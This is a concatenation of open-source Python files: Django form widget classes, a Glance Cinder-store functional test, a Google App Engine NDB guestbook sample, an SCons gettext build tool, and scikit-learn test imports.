'DateInput', 'DateTimeInput', 'TimeInput', 'CheckboxInput', 'Select',
'NullBooleanSelect', 'SelectMultiple', 'RadioSelect',
'CheckboxSelectMultiple', 'MultiWidget', 'SplitDateTimeWidget',
'SplitHiddenDateTimeWidget', 'SelectDateWidget',
)
MEDIA_TYPES = ('css', 'js')
@html_safe
@python_2_unicode_compatible
class Media(object):
def __init__(self, media=None, **kwargs):
if media:
media_attrs = media.__dict__
else:
media_attrs = kwargs
self._css = {}
self._js = []
for name in MEDIA_TYPES:
getattr(self, 'add_' + name)(media_attrs.get(name))
def __str__(self):
return self.render()
def render(self):
return mark_safe('\n'.join(chain(*[getattr(self, 'render_' + name)() for name in MEDIA_TYPES])))
def render_js(self):
return [
format_html(
'<script type="text/javascript" src="{}"></script>',
self.absolute_path(path)
) for path in self._js
]
def render_css(self):
# To keep rendering order consistent, we can't just iterate over items().
# We need to sort the keys, and iterate over the sorted list.
media = sorted(self._css.keys())
return chain(*[[
format_html(
'<link href="{}" type="text/css" media="{}" rel="stylesheet" />',
self.absolute_path(path), medium
) for path in self._css[medium]
] for medium in media])
def absolute_path(self, path, prefix=None):
if path.startswith(('http://', 'https://', '/')):
return path
if prefix is None:
if settings.STATIC_URL is None:
# backwards compatibility
prefix = settings.MEDIA_URL
else:
prefix = settings.STATIC_URL
return urljoin(prefix, path)
def __getitem__(self, name):
"Returns a Media object that only contains media of the given type"
if name in MEDIA_TYPES:
return Media(**{str(name): getattr(self, '_' + name)})
raise KeyError('Unknown media type "%s"' % name)
def add_js(self, data):
if data:
for path in data:
if path not in self._js:
self._js.append(path)
def add_css(self, data):
if data:
for medium, paths in data.items():
for path in paths:
if not self._css.get(medium) or path not in self._css[medium]:
self._css.setdefault(medium, []).append(path)
def __add__(self, other):
combined = Media()
for name in MEDIA_TYPES:
getattr(combined, 'add_' + name)(getattr(self, '_' + name, None))
getattr(combined, 'add_' + name)(getattr(other, '_' + name, None))
return combined
def media_property(cls):
def _media(self):
# Get the media property of the superclass, if it exists
sup_cls = super(cls, self)
try:
base = sup_cls.media
except AttributeError:
base = Media()
# Get the media definition for this class
definition = getattr(cls, 'Media', None)
if definition:
extend = getattr(definition, 'extend', True)
if extend:
if extend is True:
m = base
else:
m = Media()
for medium in extend:
m = m + base[medium]
return m + Media(definition)
else:
return Media(definition)
else:
return base
return property(_media)
class MediaDefiningClass(type):
"""
Metaclass for classes that can have media definitions.
"""
def __new__(mcs, name, bases, attrs):
new_class = (super(MediaDefiningClass, mcs)
.__new__(mcs, name, bases, attrs))
if 'media' not in attrs:
new_class.media = media_property(new_class)
return new_class
@html_safe
@python_2_unicode_compatible
class SubWidget(object):
"""
Some widgets are made of multiple HTML elements -- namely, RadioSelect.
This is a class that represents the "inner" HTML element of a widget.
"""
def __init__(self, parent_widget, name, value, attrs, choices):
self.parent_widget = parent_widget
self.name, self.value = name, value
self.attrs, self.choices = attrs, choices
def __str__(self):
args = [self.name, self.value, self.attrs]
if self.choices:
args.append(self.choices)
return self.parent_widget.render(*args)
class Widget(six.with_metaclass(MediaDefiningClass)):
needs_multipart_form = False # Determines does this widget need multipart form
is_localized = False
is_required = False
supports_microseconds = True
def __init__(self, attrs=None):
if attrs is not None:
self.attrs = attrs.copy()
else:
self.attrs = {}
def __deepcopy__(self, memo):
obj = copy.copy(self)
obj.attrs = self.attrs.copy()
memo[id(self)] = obj
return obj
@property
def is_hidden(self):
return self.input_type == 'hidden' if hasattr(self, 'input_type') else False
def subwidgets(self, name, value, attrs=None, choices=()):
"""
Yields all "subwidgets" of this widget. Used only by RadioSelect to
allow template access to individual <input type="radio"> buttons.
Arguments are the same as for render().
"""
yield SubWidget(self, name, value, attrs, choices)
def render(self, name, value, attrs=None):
"""
Returns this Widget rendered as HTML, as a Unicode string.
The 'value' given is not guaranteed to be valid input, so subclass
implementations should program defensively.
"""
raise NotImplementedError('subclasses of Widget must provide a render() method')
def build_attrs(self, extra_attrs=None, **kwargs):
"Helper function for building an attribute dictionary."
attrs = dict(self.attrs, **kwargs)
if extra_attrs:
attrs.update(extra_attrs)
return attrs
def value_from_datadict(self, data, files, name):
"""
Given a dictionary of data and this widget's name, returns the value
of this widget. Returns None if it's not provided.
"""
return data.get(name)
def id_for_label(self, id_):
"""
Returns the HTML ID attribute of this Widget for use by a <label>,
given the ID of the field. Returns None if no ID is available.
This hook is necessary because some widgets have multiple HTML
elements and, thus, multiple IDs. In that case, this method should
return an ID value that corresponds to the first ID in the widget's
tags.
"""
return id_
class Input(Widget):
"""
Base class for all <input> widgets (except type='checkbox' and
type='radio', which are special).
"""
input_type = None # Subclasses must define this.
def _format_value(self, value):
if self.is_localized:
return formats.localize_input(value)
return value
def render(self, name, value, attrs=None):
if value is None:
value = ''
final_attrs = self.build_attrs(attrs, type=self.input_type, name=name)
if value != '':
# Only add the 'value' attribute if a value is non-empty.
final_attrs['value'] = force_text(self._format_value(value))
return format_html('<input{} />', flatatt(final_attrs))
class TextInput(Input):
input_type = 'text'
def __init__(self, attrs=None):
if attrs is not None:
self.input_type = attrs.pop('type', self.input_type)
super(TextInput, self).__init__(attrs)
class NumberInput(TextInput):
input_type = 'number'
class EmailInput(TextInput):
input_type = 'email'
class URLInput(TextInput):
input_type = 'url'
class PasswordInput(TextInput):
input_type = 'password'
def __init__(self, attrs=None, render_value=False):
super(PasswordInput, self).__init__(attrs)
self.render_value = render_value
def render(self, name, value, attrs=None):
if not self.render_value:
value = None
return super(PasswordInput, self).render(name, value, attrs)
class HiddenInput(Input):
input_type = 'hidden'
class MultipleHiddenInput(HiddenInput):
"""
A widget that handles <input type="hidden"> for fields that have a list
of values.
"""
def __init__(self, attrs=None, choices=()):
super(MultipleHiddenInput, self).__init__(attrs)
# choices can be any iterable
self.choices = choices
def render(self, name, value, attrs=None, choices=()):
if value is None:
value = []
final_attrs = self.build_attrs(attrs, type=self.input_type, name=name)
id_ = final_attrs.get('id')
inputs = []
for i, v in enumerate(value):
input_attrs = dict(value=force_text(v), **final_attrs)
if id_:
# An ID attribute was given. Add a numeric index as a suffix
# so that the inputs don't all have the same ID attribute.
input_attrs['id'] = '%s_%s' % (id_, i)
inputs.append(format_html('<input{} />', flatatt(input_attrs)))
return mark_safe('\n'.join(inputs))
def value_from_datadict(self, data, files, name):
if isinstance(data, MultiValueDict):
return data.getlist(name)
return data.get(name)
class FileInput(Input):
input_type = 'file'
needs_multipart_form = True
def render(self, name, value, attrs=None):
return super(FileInput, self).render(name, None, attrs=attrs)
def value_from_datadict(self, data, files, name):
"File widgets take data from FILES, not POST"
return files.get(name)
FILE_INPUT_CONTRADICTION = object()
class ClearableFileInput(FileInput):
initial_text = ugettext_lazy('Currently')
input_text = ugettext_lazy('Change')
clear_checkbox_label = ugettext_lazy('Clear')
template_with_initial = (
'%(initial_text)s: <a href="%(initial_url)s">%(initial)s</a> '
'%(clear_template)s<br />%(input_text)s: %(input)s'
)
template_with_clear = '%(clear)s <label for="%(clear_checkbox_id)s">%(clear_checkbox_label)s</label>'
def clear_checkbox_name(self, name):
"""
Given the name of the file input, return the name of the clear checkbox
input.
"""
return name + '-clear'
def clear_checkbox_id(self, name):
"""
Given the name of the clear checkbox input, return the HTML id for it.
"""
return name + '_id'
def is_initial(self, value):
"""
Return whether value is considered to be initial value.
"""
# hasattr() masks exceptions on Python 2.
if six.PY2:
try:
getattr(value, 'url')
except AttributeError:
return False
else:
return bool(value)
return bool(value and hasattr(value, 'url'))
def get_template_substitution_values(self, value):
"""
Return value-related substitutions.
"""
return {
'initial': conditional_escape(value),
'initial_url': conditional_escape(value.url),
}
def render(self, name, value, attrs=None):
substitutions = {
'initial_text': self.initial_text,
'input_text': self.input_text,
'clear_template': '',
'clear_checkbox_label': self.clear_checkbox_label,
}
template = '%(input)s'
substitutions['input'] = super(ClearableFileInput, self).render(name, value, attrs)
if self.is_initial(value):
template = self.template_with_initial
substitutions.update(self.get_template_substitution_values(value))
if not self.is_required:
checkbox_name = self.clear_checkbox_name(name)
checkbox_id = self.clear_checkbox_id(checkbox_name)
substitutions['clear_checkbox_name'] = conditional_escape(checkbox_name)
substitutions['clear_checkbox_id'] = conditional_escape(checkbox_id)
substitutions['clear'] = CheckboxInput().render(checkbox_name, False, attrs={'id': checkbox_id})
substitutions['clear_template'] = self.template_with_clear % substitutions
return mark_safe(template % substitutions)
def value_from_datadict(self, data, files, name):
upload = super(ClearableFileInput, self).value_from_datadict(data, files, name)
if not self.is_required and CheckboxInput().value_from_datadict(
data, files, self.clear_checkbox_name(name)):
if upload:
# If the user contradicts themselves (uploads a new file AND
# checks the "clear" checkbox), we return a unique marker
# object that FileField will turn into a ValidationError.
return FILE_INPUT_CONTRADICTION
# False signals to clear any existing value, as opposed to just None
return False
return upload
class Textarea(Widget):
def __init__(self, attrs=None):
# Use slightly better defaults than HTML's 20x2 box
default_attrs = {'cols': '40', 'rows': '10'}
if attrs:
default_attrs.update(attrs)
super(Textarea, self).__init__(default_attrs)
def render(self, name, value, attrs=None):
if value is None:
value = ''
final_attrs = self.build_attrs(attrs, name=name)
return format_html('<textarea{}>\r\n{}</textarea>',
flatatt(final_attrs),
force_text(value))
class DateTimeBaseInput(TextInput):
format_key = ''
supports_microseconds = False
def __init__(self, attrs=None, format=None):
super(DateTimeBaseInput, self).__init__(attrs)
self.format = format if format else None
def _format_value(self, value):
return formats.localize_input(value,
self.format or formats.get_format(self.format_key)[0])
class DateInput(DateTimeBaseInput):
format_key = 'DATE_INPUT_FORMATS'
class DateTimeInput(DateTimeBaseInput):
format_key = 'DATETIME_INPUT_FORMATS'
class TimeInput(DateTimeBaseInput):
format_key = 'TIME_INPUT_FORMATS'
# Defined at module level so that CheckboxInput is picklable (#17976)
def boolean_check(v):
return not (v is False or v is None or v == '')
class CheckboxInput(Widget):
def __init__(self, attrs=None, check_test=None):
super(CheckboxInput, self).__init__(attrs)
# check_test is a callable that takes a value and returns True
# if the checkbox should be checked for that value.
self.check_test = boolean_check if check_test is None else check_test
def render(self, name, value, attrs=None):
final_attrs = self.build_attrs(attrs, type='checkbox', name=name)
if self.check_test(value):
final_attrs['checked'] = 'checked'
if not (value is True or value is False or value is None or value == ''):
# Only add the 'value' attribute if a value is non-empty.
final_attrs['value'] = force_text(value)
return format_html('<input{} />', flatatt(final_attrs))
def value_from_datadict(self, data, files, name):
if name not in data:
# A missing value means False because HTML form submission does not
# send results for unselected checkboxes.
return False
value = data.get(name)
# Translate true and false strings to boolean values.
values = {'true': True, 'false': False}
if isinstance(value, six.string_types):
value = values.get(value.lower(), value)
return bool(value)
class Select(Widget):
allow_multiple_selected = False
def __init__(self, attrs=None, choices=()):
super(Select, self).__init__(attrs)
# choices can be any iterable, but we may need to render this widget
# multiple times. Thus, collapse it into a list so it can be consumed
# more than once.
self.choices = list(choices)
def render(self, name, value, attrs=None, choices=()):
if value is None:
value = ''
final_attrs = self.build_attrs(attrs, name=name)
output = [format_html('<select{}>', flatatt(final_attrs))]
options = self.render_options(choices, [value])
if options:
output.append(options)
output.append('</select>')
return mark_safe('\n'.join(output))
def render_option(self, selected_choices, option_value, option_label):
if option_value is None:
option_value = ''
option_value = force_text(option_value)
if option_value in selected_choices:
selected_html = mark_safe(' selected="selected"')
if not self.allow_multiple_selected:
# Only allow for a single selection.
selected_choices.remove(option_value)
else:
selected_html = ''
return format_html('<option value="{}"{}>{}</option>',
option_value,
selected_html,
force_text(option_label))
def render_options(self, choices, selected_choices):
# Normalize to strings.
selected_choices = set(force_text(v) for v in selected_choices)
output = []
for option_value, option_label in chain(self.choices, choices):
if isinstance(option_label, (list, tuple)):
output.append(format_html('<optgroup label="{}">', force_text(option_value)))
for option in option_label:
output.append(self.render_option(selected_choices, *option))
output.append('</optgroup>')
else:
output.append(self.render_option(selected_choices, option_value, option_label))
return '\n'.join(output)
class NullBooleanSelect(Select):
"""
A Select Widget intended to be used with NullBooleanField.
"""
def __init__(self, attrs=None):
choices = (('1', ugettext_lazy('Unknown')),
('2', ugettext_lazy('Yes')),
('3', ugettext_lazy('No')))
super(NullBooleanSelect, self).__init__(attrs, choices)
def render(self, name, value, attrs=None, choices=()):
try:
value = {True: '2', False: '3', '2': '2', '3': '3'}[value]
except KeyError:
value = '1'
return super(NullBooleanSelect, self).render(name, value, attrs, choices)
def value_from_datadict(self, data, files, name):
value = data.get(name)
return {'2': True,
True: True,
'True': True,
'3': False,
'False': False,
False: False}.get(value)
class SelectMultiple(Select):
allow_multiple_selected = True
def render(self, name, value, attrs=None, choices=()):
if value is None:
value = []
final_attrs = self.build_attrs(attrs, name=name)
output = [format_html('<select multiple="multiple"{}>', flatatt(final_attrs))]
options = self.render_options(choices, value)
if options:
output.append(options)
output.append('</select>')
return mark_safe('\n'.join(output))
def value_from_datadict(self, data, files, name):
if isinstance(data, MultiValueDict):
return data.getlist(name)
return data.get(name)
@html_safe
@python_2_unicode_compatible
class ChoiceInput(SubWidget):
"""
An object used by ChoiceFieldRenderer that represents a single
<input type='$input_type'>.
"""
input_type = None # Subclasses must define this
def __init__(self, name, value, attrs, choice, index):
self.name = name
self.value = value
self.attrs = attrs
self.choice_value = force_text(choice[0])
self.choice_label = force_text(choice[1])
self.index = index
if 'id' in self.attrs:
self.attrs['id'] += "_%d" % self.index
def __str__(self):
return self.render()
def render(self, name=None, value=None, attrs=None, choices=()):
if self.id_for_label:
label_for = format_html(' for="{}"', self.id_for_label)
else:
label_for = ''
attrs = dict(self.attrs, **attrs) if attrs else self.attrs
return format_html(
'<label{}>{} {}</label>', label_for, self.tag(attrs), self.choice_label
)
def is_checked(self):
return self.value == self.choice_value
def tag(self, attrs=None):
attrs = attrs or self.attrs
final_attrs = dict(attrs, type=self.input_type, name=self.name, value=self.choice_value)
if self.is_checked():
final_attrs['checked'] = 'checked'
return format_html('<input{} />', flatatt(final_attrs))
@property
def id_for_label(self):
return self.attrs.get('id', '')
class RadioChoiceInput(ChoiceInput):
input_type = 'radio'
def __init__(self, *args, **kwargs):
super(RadioChoiceInput, self).__init__(*args, **kwargs)
self.value = force_text(self.value)
class CheckboxChoiceInput(ChoiceInput):
input_type = 'checkbox'
def __init__(self, *args, **kwargs):
super(CheckboxChoiceInput, self).__init__(*args, **kwargs)
self.value = set(force_text(v) for v in self.value)
def is_checked(self):
return self.choice_value in self.value
@html_safe
@python_2_unicode_compatible
class ChoiceFieldRenderer(object):
"""
An object used by RadioSelect to enable customization of radio widgets.
"""
choice_input_class = None
outer_html = '<ul{id_attr}>{content}</ul>'
inner_html = '<li>{choice_value}{sub_widgets}</li>'
def __init__(self, name, value, attrs, choices):
self.name = name
self.value = value
self.attrs = attrs
self.choices = choices
def __getitem__(self, idx):
choice = self.choices[idx] # Let the IndexError propagate
return self.choice_input_class(self.name, self.value, self.attrs.copy(), choice, idx)
def __str__(self):
return self.render()
def render(self):
"""
Outputs a <ul> for this set of choice fields.
If an id was given to the field, it is applied to the <ul> (each
item in the list will get an id of `$id_$i`).
"""
id_ = self.attrs.get('id')
output = []
for i, choice in enumerate(self.choices):
choice_value, choice_label = choice
if isinstance(choice_label, (tuple, list)):
attrs_plus = self.attrs.copy()
if id_:
attrs_plus['id'] += '_{}'.format(i)
sub_ul_renderer = self.__class__(
name=self.name,
value=self.value,
attrs=attrs_plus,
choices=choice_label,
)
sub_ul_renderer.choice_input_class = self.choice_input_class
output.append(format_html(self.inner_html, choice_value=choice_value,
sub_widgets=sub_ul_renderer.render()))
else:
w = self.choice_input_class(self.name, self.value,
self.attrs.copy(), choice, i)
output.append(format_html(self.inner_html,
choice_value=force_text(w), sub_widgets=''))
return format_html(self.outer_html,
id_attr=format_html(' id="{}"', id_) if id_ else '',
content=mark_safe('\n'.join(output)))
class RadioFieldRenderer(ChoiceFieldRenderer):
choice_input_class = RadioChoiceInput
class CheckboxFieldRenderer(ChoiceFieldRenderer):
choice_input_class = CheckboxChoiceInput
class RendererMixin(object):
renderer = None # subclasses must define this
_empty_value = None
def __init__(self, *args, **kwargs):
# Override the default renderer if we were passed one.
renderer = kwargs.pop('renderer', None)
if renderer:
self.renderer = renderer
super(RendererMixin, self).__init__(*args, **kwargs)
def subwidgets(self, name, value, attrs=None, choices=()):
for widget in self.get_renderer(name, value, attrs, choices):
yield widget
def get_renderer(self, name, value, attrs=None, choices=()):
"""Returns an instance of the renderer."""
if value is None:
value = self._empty_value
final_attrs = self.build_attrs(attrs)
choices = list(chain(self.choices, choices))
return self.renderer(name, value, final_attrs, choices)
def render(self, name, value, attrs=None, choices=()):
return self.get_renderer(name, value, attrs, choices).render()
def id_for_label(self, id_):
# Widgets using this RendererMixin are made of a collection of
# subwidgets, each with their own <label>, and distinct ID.
# The IDs are made distinct by y "_X" suffix, where X is the zero-based
# index of the choice field. Thus, the label for the main widget should
# reference the first subwidget, hence the "_0" suffix.
if id_:
id_ += '_0'
return id_
class RadioSelect(RendererMixin, Select):
renderer = RadioFieldRenderer
_empty_value = ''
class CheckboxSelectMultiple(RendererMixin, SelectMultiple):
renderer = CheckboxFieldRenderer
_empty_value = []
class MultiWidget(Widget):
"""
A widget that is composed of multiple widgets.
Its render() method is different than other widgets', because it has to
figure out how to split a single value for display in multiple widgets.
The ``value`` argument can be one of two things:
* A list.
* A normal value (e.g., a string) that has been "compressed" from
a list of values.
In the second case -- i.e., if the value is NOT a list -- render() will
first "decompress" the value into a list before rendering it. It does so by
calling the decompress() method, which MultiWidget subclasses must
implement. This method takes a single "compressed" value and returns a
list.
When render() does its HTML rendering, each value in the list is rendered
with the corresponding widget -- the first value is rendered in the first
widget, the second value is rendered in the second widget, etc.
Subclasses may implement format_output(), which takes the list of rendered
widgets and returns a string of HTML that formats them any way you'd like.
You'll probably want to use this class with MultiValueField.
"""
def __init__(self, widgets, attrs=None):
self.widgets = [w() if isinstance(w, type) else w for w in widgets]
super(MultiWidget, self).__init__(attrs)
@property
def is_hidden(self):
return all(w.is_hidden for w in self.widgets)
def render(self, name, value, attrs=None):
if self.is_localized:
for widget in self.widgets:
widget.is_localized = self.is_localized
# value is a list of values, each corresponding to a widget
# in self.widgets.
if not isinstance(value, list):
value = self.decompress(value)
output = []
final_attrs = self.build_attrs(attrs)
id_ = final_attrs.get('id')
for i, widget in enumerate(self.widgets):
try:
widget_value = value[i]
except IndexError:
widget_value = None
if id_:
final_attrs = dict(final_attrs, id='%s_%s' % (id_, i))
output.append(widget.render(name + '_%s' % i, widget_value, final_attrs))
return mark_safe(self.format_output(output))
def id_for_label(self, id_):
# See the comment for RadioSelect.id_for_label()
if id_:
id_ += '_0'
return id_
def value_from_datadict(self, data, files, name):
return [widget.value_from_datadict(data, files, name + '_%s' % i) for i, widget in enumerate(self.widgets)]
def format_output(self, rendered_widgets):
"""
Given a list of rendered widgets (as strings), returns a Unicode string
representing the HTML for the whole lot.
This hook allows you to format the HTML design of the widgets, if
needed.
"""
return ''.join(rendered_widgets)
def decompress(self, value):
"""
Returns a list of decompressed values for the given compressed value.
The given value can be assumed to be valid, but not necessarily
non-empty.
"""
raise NotImplementedError('Subclasses must implement this method.')
def _get_media(self):
"Media for a multiwidget is the combination of all media of the subwidgets"
media = Media()
for w in self.widgets:
media = media + w.media
return media
media = property(_get_media)
def __deepcopy__(self, memo):
obj = super(MultiWidget, self).__deepcopy__(memo)
obj.widgets = copy.deepcopy(self.widgets)
return obj
@property
def needs_multipart_form(self):
return any(w.needs_multipart_form for w in self.widgets)
class SplitDateTimeWidget(MultiWidget):
"""
A Widget that splits datetime input into two <input type="text"> boxes.
"""
supports_microseconds = False
def __init__(self, attrs=None, date_format=None, time_format=None):
widgets = (DateInput(attrs=attrs, format=date_format),
TimeInput(attrs=attrs, format=time_format))
super(SplitDateTimeWidget, self).__init__(widgets, attrs)
def decompress(self, value):
if value:
value = to_current_timezone(value)
return [value.date(), value.time().replace(microsecond=0)]
return [None, None]
class SplitHiddenDateTimeWidget(SplitDateTimeWidget):
"""
A Widget that splits datetime input into two <input type="hidden"> inputs.
"""
def __init__(self, attrs=None, date_format=None, time_format=None):
super(SplitHiddenDateTimeWidget, self).__init__(attrs, date_format, time_format)
for widget in self.widgets:
widget.input_type = 'hidden'
class SelectDateWidget(Widget):
"""
A Widget that splits date input into three <select> boxes.
This also serves as an example of a Widget that has more than one HTML
element and hence implements value_from_datadict.
"""
none_value = (0, '---')
month_field = '%s_month'
day_field = '%s_day'
year_field = '%s_year'
date_re = re.compile(r'(\d{4})-(\d\d?)-(\d\d?)$')
def __init__(self, attrs=None, years=None, months=None, empty_label=None):
self.attrs = attrs or {}
# Optional list or tuple of years to use in the "year" select box.
if years:
self.years = years
else:
this_year = datetime.date.today().year
self.years = range(this_year, this_year + 10)
# Optional dict of months to use in the "month" select box.
if months:
self.months = months
else:
self.months = MONTHS
# Optional string, list, or tuple to use as empty_label.
if isinstance(empty_label, (list, tuple)):
if not len(empty_label) == 3:
raise ValueError('empty_label list/tuple must have 3 elements.')
self.year_none_value = (0, empty_label[0])
self.month_none_value = (0, empty_label[1])
self.day_none_value = (0, empty_label[2])
else:
if empty_label is not None:
self.none_value = (0, empty_label)
self.year_none_value = self.none_value
self.month_none_value = self.none_value
self.day_none_value = self.none_value
@staticmethod
def _parse_date_fmt():
fmt = get_format('DATE_FORMAT')
escaped = False
for char in fmt:
if escaped:
escaped = False
elif char == '\\':
escaped = True
elif char in 'Yy':
yield 'year'
elif char in 'bEFMmNn':
yield 'month'
elif char in 'dj':
yield 'day'
def render(self, name, value, attrs=None):
try:
year_val, month_val, day_val = value.year, value.month, value.day
except AttributeError:
year_val = month_val = day_val = None
if isinstance(value, six.string_types):
if settings.USE_L10N:
try:
input_format = get_format('DATE_INPUT_FORMATS')[0]
v = datetime.datetime.strptime(force_str(value), input_format)
year_val, month_val, day_val = v.year, v.month, v.day
except ValueError:
pass
if year_val is None:
match = self.date_re.match(value)
if match:
year_val, month_val, day_val = [int(val) for val in match.groups()]
html = {}
choices = [(i, i) for i in self.years]
html['year'] = self.create_select(name, self.year_field, value, year_val, choices, self.year_none_value)
choices = list(self.months.items())
html['month'] = self.create_select(name, self.month_field, value, month_val, choices, self.month_none_value)
choices = [(i, i) for i in range(1, 32)]
html['day'] = self.create_select(name, self.day_field, value, day_val, choices, self.day_none_value)
output = []
for field in self._parse_date_fmt():
output.append(html[field])
return mark_safe('\n'.join(output))
def id_for_label(self, id_):
for first_select in self._parse_date_fmt():
return '%s_%s' % (id_, first_select)
else:
return '%s_month' % id_
def value_from_datadict(self, data, files, name):
y = data.get(self.year_field % name)
m = data.get(self.month_field % name)
d = data.get(self.day_field % name)
if y == m == d == "0":
return None
if y and m and d:
if settings.USE_L10N:
input_format = get_format('DATE_INPUT_FORMATS')[0]
try:
date_value = datetime.date(int(y), int(m), int(d))
except ValueError:
return '%s-%s-%s' % (y, m, d)
else:
date_value = datetime_safe.new_date(date_value)
return date_value.strftime(input_format)
else:
return '%s-%s-%s' % (y, m, d)
return data.get(name)
def create_select(self, name, field, value, val, choices, none_value):
if 'id' in self.attrs:
id_ = self.attrs['id']
else:
id_ = 'id_%s' % name
if not self.is_required:
choices.insert(0, none_value)
local_attrs = self.build_attrs(id=field % id_)
s = Select(choices=choices)
select_html = s.render(field % name, val, local_attrs)
return select_html
|
citrix-openstack-build/glance
|
refs/heads/master
|
glance/tests/functional/store/test_cinder.py
|
4
|
# vim: tabstop=4 shiftwidth=4 softtabstop=4
# Copyright 2013 OpenStack, LLC
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""
Functional tests for the Cinder store interface
"""
import os
import oslo.config.cfg
import testtools
import glance.store.cinder as cinder
import glance.tests.functional.store as store_tests
import glance.tests.functional.store.test_swift as store_tests_swift
import glance.tests.utils
def parse_config(config):
out = {}
options = [
'test_cinder_store_auth_address',
'test_cinder_store_auth_version',
'test_cinder_store_tenant',
'test_cinder_store_user',
'test_cinder_store_key',
]
for option in options:
out[option] = config.defaults()[option]
return out
class TestCinderStore(store_tests.BaseTestCase, testtools.TestCase):
store_cls_path = 'glance.store.cinder.Store'
store_cls = glance.store.cinder.Store
store_name = 'cinder'
def setUp(self):
config_path = os.environ.get('GLANCE_TEST_CINDER_CONF')
if not config_path:
msg = "GLANCE_TEST_CINDER_CONF environ not set."
self.skipTest(msg)
oslo.config.cfg.CONF(args=[], default_config_files=[config_path])
raw_config = store_tests_swift.read_config(config_path)
try:
self.cinder_config = parse_config(raw_config)
ret = store_tests_swift.keystone_authenticate(
self.cinder_config['test_cinder_store_auth_address'],
self.cinder_config['test_cinder_store_auth_version'],
self.cinder_config['test_cinder_store_tenant'],
self.cinder_config['test_cinder_store_user'],
self.cinder_config['test_cinder_store_key'])
(tenant_id, auth_token, service_catalog) = ret
self.context = glance.context.RequestContext(
tenant=tenant_id,
service_catalog=service_catalog,
auth_tok=auth_token)
self.cinder_client = cinder.get_cinderclient(self.context)
except Exception as e:
msg = "Cinder backend isn't set up: %s" % e
self.skipTest(msg)
super(TestCinderStore, self).setUp()
def get_store(self, **kwargs):
store = cinder.Store(context=kwargs.get('context') or self.context)
store.configure()
store.configure_add()
return store
def stash_image(self, image_id, image_data):
#(zhiyan): Currently cinder store is a partial implementation,
# after Cinder expose 'brick' library, 'host-volume-attaching' and
# 'multiple-attaching' enhancement ready, the store will support
# ADD/GET/DELETE interface.
raise NotImplementedError('stash_image can not be implemented so far')
|
GoogleCloudPlatform/python-docs-samples
|
refs/heads/master
|
appengine/standard/ndb/overview/main.py
|
4
|
# Copyright 2015 Google Inc. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Cloud Datastore NDB API guestbook sample.
This sample is used on this page:
https://cloud.google.com/appengine/docs/python/ndb/
For more information, see README.md
"""
# [START all]
import cgi
import textwrap
import urllib
from google.appengine.ext import ndb
import webapp2
# [START greeting]
class Greeting(ndb.Model):
"""Models an individual Guestbook entry with content and date."""
content = ndb.StringProperty()
date = ndb.DateTimeProperty(auto_now_add=True)
# [END greeting]
# [START query]
@classmethod
def query_book(cls, ancestor_key):
return cls.query(ancestor=ancestor_key).order(-cls.date)
class MainPage(webapp2.RequestHandler):
def get(self):
self.response.out.write('<html><body>')
guestbook_name = self.request.get('guestbook_name')
ancestor_key = ndb.Key("Book", guestbook_name or "*notitle*")
greetings = Greeting.query_book(ancestor_key).fetch(20)
# [END query]
greeting_blockquotes = []
for greeting in greetings:
greeting_blockquotes.append(
'<blockquote>%s</blockquote>' % cgi.escape(greeting.content))
self.response.out.write(textwrap.dedent("""\
<html>
<body>
{blockquotes}
<form action="/sign?{sign}" method="post">
<div>
<textarea name="content" rows="3" cols="60">
</textarea>
</div>
<div>
<input type="submit" value="Sign Guestbook">
</div>
</form>
<hr>
<form>
Guestbook name:
<input value="{guestbook_name}" name="guestbook_name">
<input type="submit" value="switch">
</form>
</body>
</html>""").format(
blockquotes='\n'.join(greeting_blockquotes),
sign=urllib.urlencode({'guestbook_name': guestbook_name}),
guestbook_name=cgi.escape(guestbook_name)))
# [START submit]
class SubmitForm(webapp2.RequestHandler):
def post(self):
# We set the parent key on each 'Greeting' to ensure each guestbook's
# greetings are in the same entity group.
guestbook_name = self.request.get('guestbook_name')
greeting = Greeting(parent=ndb.Key("Book",
guestbook_name or "*notitle*"),
content=self.request.get('content'))
greeting.put()
# [END submit]
self.redirect('/?' + urllib.urlencode(
{'guestbook_name': guestbook_name}))
app = webapp2.WSGIApplication([
('/', MainPage),
('/sign', SubmitForm)
])
# [END all]
|
albzan/attribra
|
refs/heads/master
|
site_scons/site_tools/gettexttool/__init__.py
|
22
|
""" This tool allows generation of gettext .mo compiled files, pot files from source code files
and pot files for merging.
Three new builders are added into the constructed environment:
- gettextMoFile: generates .mo file from .pot file using msgfmt.
- gettextPotFile: Generates .pot file from source code files.
- gettextMergePotFile: Creates a .pot file appropriate for merging into existing .po files.
To properly configure get text, define the following variables:
- gettext_package_bugs_address
- gettext_package_name
- gettext_package_version
"""
from SCons.Action import Action
def exists(env):
return True
XGETTEXT_COMMON_ARGS = (
"--msgid-bugs-address='$gettext_package_bugs_address' "
"--package-name='$gettext_package_name' "
"--package-version='$gettext_package_version' "
"-c -o $TARGET $SOURCES"
)
def generate(env):
env.SetDefault(gettext_package_bugs_address="example@example.com")
env.SetDefault(gettext_package_name="")
env.SetDefault(gettext_package_version="")
env['BUILDERS']['gettextMoFile']=env.Builder(
action=Action("msgfmt -o $TARGET $SOURCE", "Compiling translation $SOURCE"),
suffix=".mo",
src_suffix=".po"
)
env['BUILDERS']['gettextPotFile']=env.Builder(
action=Action("xgettext " + XGETTEXT_COMMON_ARGS, "Generating pot file $TARGET"),
suffix=".pot")
env['BUILDERS']['gettextMergePotFile']=env.Builder(
action=Action("xgettext " + "--omit-header --no-location " + XGETTEXT_COMMON_ARGS,
"Generating pot file $TARGET"),
suffix=".pot")
|
pv/scikit-learn
|
refs/heads/master
|
sklearn/tests/test_lda.py
|
77
|
import numpy as np
from sklearn.utils.testing import assert_array_equal
from sklearn.utils.testing import assert_array_almost_equal
from sklearn.utils.testing import assert_equal
from sklearn.utils.testing import assert_almost_equal
